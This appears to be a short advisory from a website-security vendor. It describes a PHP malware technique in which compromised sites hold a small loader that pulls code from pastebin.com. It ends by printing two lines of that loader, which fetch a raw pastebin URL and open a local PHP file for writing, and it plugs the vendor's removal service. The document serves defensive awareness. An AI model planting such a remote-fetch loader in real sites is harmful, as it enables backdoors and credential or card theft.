Attackers uses pastebin.com (website that is used for storing snippets of pain text) to host the malicious code and leaving a small call on the infected site.
This technique is used to avoid malware to be easily spotted, since big encoded chunks of code or other unusual functions can trigger the simplest of the tools.
This is a dangerous code due to the fact that it has the ability to download and record any kind of malicious code from pastebin.com, it can be a backdoor, a botnet client, a credit card stealer or even a client side browser exploit.
This malicious code affects any vulnerable or compromised website that is configured to interpret the script language. Outdated websites, or sites that have poor passwords for FTP/SFTP connections are targeted most.
Inspect your site's files, specially theme related, to find for code you don't recognize. Look for any encoded or obfuscated PHP code.
Also, you can sign up with us and let our team remove the malware for you.
$z = file_get_contents("http[:]//pastebin[.]com/raw/s8CSegT5");
$x = fopen("fm.php","w");